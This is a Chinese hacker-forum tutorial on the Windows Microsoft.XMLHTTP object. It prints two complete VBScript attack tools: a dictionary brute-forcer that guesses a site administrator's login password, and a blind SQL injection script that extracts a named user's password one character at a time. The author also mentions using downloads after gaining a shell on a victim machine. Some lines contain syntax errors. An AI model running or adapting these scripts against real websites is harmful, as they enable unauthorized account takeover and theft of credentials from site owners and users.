文章作者:千寂孤城
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注意:转载文章请保持文章的完整性 保留作者的名字
最近迷上了脚本,发现里面有个Microsoft.XMLHTTP对象很有用,学习了一阵子,把心得写在这里,也算是一篇学习总结吧。
Microsoft.XMLHTTP是为支持XML而设计的对象,通过http协议访问网络。要直接把它讲清楚比较难,我们还是在实例中学习吧。
1、用Microsoft.XMLHTTP写一个支持断点续传下载web资源的程序。
这点应该是大家最熟悉的,很多人都用Microsoft.XMLHTTP干过这事儿,类似的脚本到处都是,所以对于这方面的用途就不占用版面多写了。(没看过这方面代码的朋友可以找我要:love_smj@sina.com)
当然,这种程序对于入侵时只得到了一个溢出的shell又想往对方机子上放东西时还是很有用的。:)
2、用Microsoft.XMLHTTP写一个自动填写表单的程序。
想到了什么?强注会员?自动投票?我们还是结合例子来说吧。以下是我写的一个穷举猜管理员(当然,普通用户也行)密码的程序,实用性并不高。
--------------------------------------------------------------------------------------
set outstreem=wscript.stdout
set instreem=wscript.stdin
set http=createobject("Microsoft.XMLHTTP")
set fso=createobject("scripting.filesystemobject")
set shell=createobject("wscript.shell")
if lcase(right(wscript.fullname,11))="wscript.exe" then
shell.run("cmd.exe /k echo off&cls&cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if '这里的目的是用cscript.exe来执行脚本
wscript.echo string(79,"*")
wscript.echo ""
wscript.echo " by 千寂孤城 E-mail:love_smj@sina.com"
wscript.echo ""
wscript.echo string(79,"*")
wscript.echo "若要破解的用户名是汉字,请使用IE将其转换为16进制!!"
outstreem.write "登陆页面的路径是:"
webpath=instreem.readline '取得"http://xxxxx/login.asp"一类的登陆路径
outstreem.write "要破解的用户名:"
name=instreem.readline '这里注意,用户名如果是汉字必须用ie转换成16进制。比如说如果用户名是“一二”,就要输入:%B0%A1%B0%A1
outstreem.write "表单中用于输入用户名的文本框名字:"
bdname=instreem.readline
outstreem.write "表单中用于输入密码的密码框名字:"
bdpass=instreem.readline
outstreem.write "字典在哪里:"
path=instreem.readline '没有字典的话直接按回车,程序会自己生成字典。
if path="" then
wscript.echo "Dictionary not found!!"
wscript.echo "Now making dictionary 'C:/dic.dic'... please wait..."
set dic=fso.createtextfile("c:/dic.dic",true)
for j=0 to 999999
writeable=true
xieru=string(6-len(cstr(j)),"0")&cstr(j)
if mid(xieru,1,1)<>mid(xieru,2,1) and mid(xieru,2,1)<>mid(xieru,3,1) and mid(xieru,3,1)<>mid(xieru,4,1) and mid(xieru,4,1)<>mid(xieru,5,1) and mid(xieru,5,1)<>mid(xieru,6,1) then
for k=0 to 9
if len(replace(xieru,k,""))<4 then writeable=false
next
if writeable=true then dic.writeline xieru
end if
next
dic.close
path="c:/dic.dic"
end if
'以上生成的字典里是6位数字的密码,每个密码中相同的数字最多有2个,且不相邻。
wscript.echo "OK!! Fucking started! Please wait..."
set zidian=fso.opentextfile(path)
pwd=zidian.readline
http.open "POST",webpath,false
http.setrequestheader "Content-Type","application/x-www-form-urlencoded"
'由于是提交表单,所以这一句必须要!否则会出错的
http.send bdname&"="&name&"&"&bdpass&"="&pwd
falselen=len(Http.responsebody)
'得到返回数据的长度。这个长度一定是错误的,不然你可以买彩票了。
wscript.echo "trying:"&pwd
do '开始破解
if zidian.atendofstream=true then
wscript.echo "Sorry,the pwd is beyond "&path&"."
wscript.quit
end if
pwd=zidian.readline
http.open "POST",webpath,false
http.setrequestheader "Content-Type","application/x-www-form-urlencoded"
http.send bdname&"="&name&"&"&bdpass&"="&pwd
if len(Http.responsebody)<falselen-50 or len(Http.responsebody)>falselen+50 then
exit do
end if
'如果返回的数据长度和falselen相差太大就说明密码正确了。
wscript.echo "trying:"&pwd
loop
zidian.close
wscript.echo "Good Luck!!"
wscript.echo "password is "&pwd
wscript.echo "the log file is 'c:/result.log'"
set result=fso.opentextfile("c:/result.log",8,true)
result.writeline "user:"&name&" pass:"&pwd
result.close
--------------------------------------------------------------------------------------
3、用Microsoft.XMLHTTP来写sql注入程序。
记得看到过一篇《用vbs来写sql注入等80端口的攻击脚本》(请看http://www.eviloctal.com/forum/read.php?tid=11005&fpage=1)
那篇文章中所说的对象必须要装Microsoft ACT(Visual Studio.Net里一个工具)才能用,很麻烦。其实要写sql注入程序,用Microsoft.XMLHTTP也能办到。由于Microsoft.XMLHTTP是windows自带的,不需要安什么就能用。
还是用实例说话。以下程序是我用Microsoft.XMLHTTP改写的随爱飞翔的那个程序。(请看http://www.eviloctal.com/forum/read.php?tid=11005&fpage=1)
--------------------------------------------------------------------------------------
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
set http=createobject("Microsoft.XMLHTTP")
set shell=createobject("wscript.shell")
dim strings = "0123456789abcdefghijklmnopqrstuvwxyz"
dim pwd_len
dim pwd
pwd=""
if lcase(right(wscript.fullname,11))="wscript.exe" then
shell.run("cmd.exe /k echo off&cls&cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
wscript.echo string(79,"*")
wscript.echo ""
wscript.echo " by 千寂孤城 E-mail:love_smj@sina.com"
wscript.echo ""
wscript.echo string(79,"*")
wscript.echo "若要破解的用户名是汉字,请使用IE将其转换为16进制!!"
outstreem.write "注入点:"
webpath=instreem.readline
outstreem.write "要破解的用户:"
username=instreem.readline
http.open "POST",webpath,false
http.send
truelen=len(Http.responsebody)
WScript.Echo "开始探测,请等待... ..."
'得到用户的密码的长度
for i = 0 to 128 step
http.open "POST",webpath&" and exists (select userid from student where len(userpwd)="&cstr(i)&" and userid='"&username&"')",false
http.send
if len(Http.responsebody)>truelen-50 and len(Http.responsebody)<truelen+50 then
pwd_len=i
exit for
end if
next
'猜解用户的密码
for j = 1 to pwd_len
for k = 1 to len(strings)
http.open "POST",webpath&" and exists (select userid from student where left(userpwd,"&cstr(j)&")='"& pwd & mid(strings,k,1) &"' and userid='"&username&"'",false
http.send
if len(Http.responsebody)>truelen-50 and len(Http.responsebody)<truelen+50 then
pwd=pwd&mid(strings,k,1)
end if
next
next
If err Then
WScript.Echo "错误:" & Error.Description
Error.Clear
Else
'输出密码
WScript.Echo "密码:" & pwd
End If
--------------------------------------------------------------------------------------
2532
“相关推荐”对你有帮助么?
-
非常没帮助 -
没帮助 -
一般 -
有帮助 -
非常有帮助
提交
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
